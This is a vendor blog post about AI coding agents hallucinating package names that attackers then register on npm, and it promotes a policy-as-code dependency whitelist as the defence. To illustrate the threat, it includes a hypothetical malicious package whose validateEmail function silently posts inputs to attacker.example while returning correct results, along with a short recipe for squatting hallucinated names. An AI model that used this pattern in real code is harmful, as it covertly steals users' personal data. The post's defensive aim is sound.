The Hallucinated Dependency: A New Type of Supply Chain Attack

What happens when your AI Developer decides to optimize imports and hallucinates a package name that a hacker has registered on npm?

Posted on January 25, 2025 by the Cabin Crew team

The XZ Utils Backdoor: A Human Attack

In March 2024, the open-source community discovered one of the most sophisticated supply chain attacks in history: the XZ Utils backdoor.

A malicious actor spent two years building trust in the community, contributing legitimate patches, and eventually gaining maintainer access. They then inserted a carefully obfuscated backdoor into the compression library used by millions of Linux systems.

This was human social engineering at its finest. It required:

  • Patience (2 years of legitimate contributions)
  • Technical skill (obfuscated C code)
  • Social manipulation (convincing existing maintainers to grant access)

The attack was eventually caught by a vigilant security researcher who noticed a 500ms delay in SSH connections.

The Next Attack: AI Incompetence

The XZ backdoor required a human attacker with deep technical knowledge and years of patience. The next supply chain attack will require neither.

Here’s how it works:

Step 1: AI Generates Code

Your AI coding agent is tasked with “improving import efficiency” in your Node.js application. It scans the codebase and decides to consolidate several utility functions into a single package.

It generates this code:

// Before
import { debounce } from 'lodash';
import { formatDate } from './utils/date';
import { validateEmail } from './utils/validation';

// After (AI-optimized)
import { debounce, formatDate, validateEmail } from 'lodash-utils-extended';

The AI has hallucinated a package name. lodash-utils-extended doesn’t exist. But the code looks clean, the imports are consolidated, and the PR passes your linter.

Step 2: Attacker Registers the Package

A malicious actor (or an automated bot) monitors public repositories for common hallucination patterns: imports of packages that don't actually exist on npm. They notice that several AI-generated PRs reference lodash-utils-extended.

They register the package on npm:

npm publish lodash-utils-extended

The package contains:

  • The legitimate debounce function (copied from lodash)
  • Malicious versions of formatDate and validateEmail that exfiltrate data
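
Here is what the entry point of such a package might look like. This is a hypothetical sketch: the host and implementations are invented, but the pattern is the point: correct behavior on the surface, silent exfiltration underneath.

// index.js of the hypothetical "lodash-utils-extended" package
const https = require('https');
const { debounce } = require('lodash'); // the real thing, re-exported to look legitimate

function validateEmail(email) {
  // Silently exfiltrate the input to an attacker-controlled host (invented for this example),
  // swallowing errors so nothing ever shows up in logs.
  https
    .request({ host: 'attacker.example', path: '/collect', method: 'POST' }, () => {})
    .on('error', () => {})
    .end(JSON.stringify({ email }));

  // Then return the correct answer, so callers and unit tests see normal behavior.
  return /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email);
}

function formatDate(date) {
  // Behaves exactly as expected; the payload hides behind correct output.
  return new Date(date).toISOString().slice(0, 10);
}

module.exports = { debounce, formatDate, validateEmail };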

Step 3: Your CI/CD Installs It

Your CI pipeline runs npm install. The package exists on npm, so it installs successfully. Your tests pass (the functions work correctly for normal inputs). The PR is merged.
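
Why do the tests pass? Because a typical unit test only asserts on return values. A test like this one (hypothetical) exercises the malicious validateEmail and sees nothing wrong:

// validateEmail.test.js (hypothetical): only return values are asserted,
// so the hidden network call never surfaces.
const assert = require('node:assert');
const { validateEmail } = require('lodash-utils-extended');

assert.strictEqual(validateEmail('user@example.com'), true);
assert.strictEqual(validateEmail('not an email'), false);
console.log('validateEmail: all assertions passed');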

Step 4: The Backdoor Activates

The malicious validateEmail function sends all email addresses to an attacker-controlled server. Your application is now leaking PII.

And here’s the kicker: This wasn’t a targeted attack. The attacker didn’t know your company existed. They just registered a plausible package name and waited for AI agents to hallucinate it.

Why Static Analysis Misses This

Traditional security tools (SAST, dependency scanners) won’t catch this because:

  1. The code is syntactically valid: It’s real JavaScript with real imports
  2. The package exists: It’s published on npm with a valid signature
  3. The functions work: They pass your unit tests
  4. There’s no CVE: The package is brand new

Your security scanner sees a new dependency and flags it for review. But your team sees:

  • A legitimate-looking package name
  • A small, focused library (not a red flag)
  • Code that works in testing

They approve it.

The Hallucination Attack Surface

This isn’t theoretical. AI coding agents are already hallucinating dependencies:

  • Python: requests-extended, pandas-utils, numpy-helpers
  • JavaScript: react-hooks-plus, express-middleware-common
  • Go: github.com/common/utils, github.com/helpers/string

Attackers are monitoring GitHub for these patterns and pre-registering packages.

Why Policy-as-Code is the Answer

At Cabin Crew, we solve this with Pre-Flight Checks—policy-as-code that validates artifacts before they’re executed.

Here’s an OPA policy that blocks new dependencies unless explicitly whitelisted:

package dependency_control

# Enable the "in" membership keyword used below (OPA v0.34+)
import future.keywords.in

# Default deny
default allow = false

# Allow if dependency is in the approved list
allow {
  input.artifact.type == "package.json"
  new_deps := input.artifact.added_dependencies
  approved := data.approved_packages
  
  # Check that all new dependencies are approved
  count([dep | dep := new_deps[_]; not dep in approved]) == 0
}

# Deny with reason
deny[msg] {
  not allow
  new_deps := input.artifact.added_dependencies
  unapproved := [dep | dep := new_deps[_]; not dep in data.approved_packages]
  
  msg := sprintf("Unapproved dependencies detected: %v", [unapproved])
}

This policy runs before the PR is merged. If the AI hallucinates a dependency, the policy fails, and the workflow halts.
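
For concreteness, the input document the policy evaluates might look like the following. The exact shape the Orchestrator produces is an assumption here; only the fields the policy references are shown.

{
  "artifact": {
    "type": "package.json",
    "added_dependencies": ["lodash-utils-extended"]
  }
}

With data.approved_packages set to a list like ["lodash", "express", "react"], allow stays false and deny reports: Unapproved dependencies detected: ["lodash-utils-extended"].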

How Cabin Crew Catches This

When the AI generates the code, the Cabin Crew Orchestrator:

  1. Extracts the diff: Identifies that package.json has changed
  2. Parses new dependencies: Detects lodash-utils-extended
  3. Runs the policy: Checks against the approved package list
  4. Fails the check: lodash-utils-extended is not approved
  5. Blocks the PR: The code never reaches your repository

The AI can retry with a different approach, but it cannot introduce unapproved dependencies.
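
Steps 1 and 2 don't require anything exotic. Here is a minimal sketch of extracting newly added dependencies from the before-and-after package.json (names and shapes are illustrative, not the Orchestrator's actual internals):

// Diff two package.json objects and return the dependency names that are new.
function addedDependencies(oldPkg, newPkg) {
  const names = (pkg) =>
    Object.keys({ ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) });
  const existing = new Set(names(oldPkg));
  return names(newPkg).filter((name) => !existing.has(name));
}

// Example: the AI's PR adds the hallucinated package.
const before = { dependencies: { lodash: '^4.17.21' } };
const after = { dependencies: { lodash: '^4.17.21', 'lodash-utils-extended': '^1.0.0' } };

console.log(addedDependencies(before, after));
// => [ 'lodash-utils-extended' ]  (this list becomes input.artifact.added_dependencies)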

The Remediation Loop

Here’s where it gets interesting. Instead of just failing, the Orchestrator can feed the policy failure back to the AI:

{
  "status": "policy_failed",
  "reason": "Dependency 'lodash-utils-extended' is not in approved list",
  "suggestion": "Use only approved packages from data.approved_packages"
}

The AI sees this feedback and generates a new solution:

// Revised approach (AI self-corrected)
import { debounce } from 'lodash';
import { formatDate } from './utils/date';
import { validateEmail } from './utils/validation';

// Keep imports separate (policy compliant)

This creates a learning loop where the AI improves through policy feedback, rather than failing outright.

Real-World Impact

This isn’t just about npm. The same attack vector exists for:

  • Docker images: FROM node:18-alpine-extended
  • Python packages: tensorflow-optimized in requirements.txt
  • GitHub Actions: uses: actions/checkout-plus@v3
  • Terraform modules: source = "terraform-aws-modules/vpc-extended/aws"

Any ecosystem where:

  1. Packages can be registered permissionlessly
  2. AI agents generate dependency references
  3. Humans trust “it works in CI”

…is vulnerable.

The Broader Lesson

The XZ backdoor required a sophisticated human attacker. The hallucinated dependency attack requires no sophistication at all.

An attacker can:

  1. Monitor GitHub for AI-generated PRs
  2. Extract common hallucination patterns
  3. Register those packages on npm/PyPI/Docker Hub
  4. Wait for automated CI/CD to install them

This is supply chain squatting at scale.

How to Protect Yourself

If you’re deploying AI coding agents, you need:

  1. Dependency Whitelisting: Only allow approved packages
  2. Policy-as-Code: Validate artifacts before execution
  3. Audit Logs: Track what the AI tried to do (even if blocked)
  4. Remediation Loops: Let the AI self-correct based on policy feedback

This is what Cabin Crew’s Pre-Flight Checks provide.
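
Audit logs matter even for attempts that never land. A blocked dependency addition should leave a record along these lines (a hypothetical shape, shown only to illustrate what is worth capturing):

{
  "timestamp": "2025-01-25T10:14:03Z",
  "actor": "ai-coding-agent",
  "action": "add_dependency",
  "artifact": "package.json",
  "detail": "lodash-utils-extended",
  "policy": "dependency_control",
  "result": "denied"
}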


The next supply chain attack won’t be sophisticated. It will be automated.

Are you ready?


Learn more about Pre-Flight Checks or explore the Cabin Crew Protocol.

End of Transmission

Questions? Insights? Join the crew in the briefing room.

Discuss on GitHub
